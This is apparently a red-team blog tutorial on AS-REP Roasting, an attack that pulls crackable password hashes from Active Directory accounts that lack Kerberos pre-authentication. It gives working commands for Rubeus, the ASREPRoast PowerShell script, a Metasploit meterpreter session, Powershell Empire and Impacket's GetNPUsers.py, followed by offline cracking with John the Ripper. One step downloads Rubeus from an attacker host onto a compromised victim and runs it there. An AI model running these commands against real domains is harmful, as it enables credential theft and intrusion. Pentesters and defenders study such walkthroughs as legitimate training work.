Red Teaming

AS-REP Roasting

In our previous articles, we have discussed “Golden ticket Attack”, “Kerberoast” and Kerberos Brute Force” multiple methods to abuse Kerberos which is a ticking protocol.

Today we are going to discuss one more technique “AS-REP Roasting” which is used for the Kerberos attack.

Tools Required

  • Rubeus.exe
  • ASREPRoast PowerShell Script
  • Impacket

AS-REP Roasting

AS-REP roasting is an offensive technique against Kerberos that allows password hashes to be retrieved for users that do not require pre-authentication. If the user has “Do not use Kerberos pre-authentication” enabled, then an attacker can recover a Kerberos AS-REP encrypted with the users RC4-HMAC’d password and he can attempt to crack this ticket offline.

Pre-authentication is the initial stage in Kerberos authentication, which is managed by the KDC Authentication server and is meant to prevent brute-force attacks.

Difference between AS-REP Roasting| Kerberoasting| Golden Ticket

If you’re confused between Golden Ticket, Kerberoast and As-REP Roasting Attack, then I can keep these attacks in a very simple way:

  • AS-REP Roasting: An attack to retrieve the user hashes that can be brute-forced offline.
  • Kerberoasting: An attack to retrieve the Application Service hashes that can be brute-forced offline.
  • Golden Ticket: Access the Application Service through Impersonate user account that does not exist in Domain.

By default, Do Not Require Pre-Authentication is disabled for the domain user.

Thus, to test the AS-REP Roasting attack, we will enable the “Do not require pre-authentication” for user Yashika. Once all prerequisites are done which required to perform this attack, we can further use multiple tools to abuse Kerberos against AS-REP Roasting attack.

On the local system, you can easily enumerate User account with “Do not require pre-authentication” with the help of the following command.

Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name

Let’s Begin the war!!!

Attack on Local Machine

Rubeus.exe

As I have already mentioned in the previous article that this tool is awesome because it is easy to use and directly run on the local environment of the victim machine.

Download it from here

Rubeus.exe asreproast

As soon as you will run the above command it with dump the user account hashes (key) used to encrypt timestamp.  Save the hashes in text document for cracking password offline.

As you can observe a log is generate for TGT request with Event-ID 4678

Similarly, we have run the following command which will be saved the extracted hash in the john crackable format inside a text file.

Rubeus.exe asreproast /format:john /outfile:hash.txt

Now its time to decrypt the hash and extract the password. As you observe we have used john the ripper for password cracking.

ASREPRoast PowerShell Script

Similarly, this can be done with the help of  Powershell Script “ASREPRoast”. Download the script and Import the module in powershell and run following command to extract user hash with AS_REP message.

Import-Module .\ASREPRoast.ps1
Invoke-ASREPRoast
Invoke-ASREPRoast | select -ExpandProperty Hash

As soon as you will execute above command it will dump the user hash, if you want to extract the hash in a file then you can follow below command also.

Invoke-ASREPRoast | select -ExpandProperty Hash > hashdump

As soon as you will run the above command it with dump the user account hashes (key) used to encrypt timestamp. Once you retrieved the hash, you can go with password brute force as done above.

Attack on Remote Machine

Metasploit

If you are Metasploit lover and want to perform the whole attack remotely then you need to obtain meterpreter session of the victim’s machine for loading powershell then upload the Powershell Script “ASREPRoast” thus run the following command within your meterpreter  session:

upload /root/ASREPROAST.ps1 .
powershell
Import-Module .\ASREPRoast.ps1
Invoke-ASREPRoast

Once you retrieved the hash, you can go with password brute force as done above.

Powershell Empire

If you are Powershell Empire user and want to use Empire for ASREPRoast attack, then first you need to compromise the victim machine and obtain the agent session. Now run following module to identify PreauthNotRequired is selected or not.

usemodule situational_awareness/network/powerview/get_user

Now download the Rubeus.exe in your Kali Linux and upload it in victim’s machine remotely.

shell wget http://192.168.1.112:8000/Rebeus.exe -outfile rubeus.exe
shell .\Rubeus.exe asreproast

As soon as you will run the above command it with dump the user account hashes (key) used to encrypt timestamp.  Save the hashes in text document for cracking password offline.

Impacket

GetNPUsers.py script will attempt to list and get TGTs for those users that have the property ‘Do not require Kerberos pre-authentication’ set (UF_DONT_REQUIRE_PREAUTH). For those users with such configuration, a John the Ripper output will be generated so you can send it for cracking.

python GetNPUsers.py -dc-ip 192.168.1.105 ignite.local/ -usersfile users.txt -format john -outputfile hashes
john –-wordlist=/usr/share/wordlists/rockyou.txt hashes

Here we have provided username list to identify DONT_REQUIRE_PREAUTH and obtain hashes. Further, use john the ripper for password brute force.

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester. Can be Contacted on Twitter and LinkedIn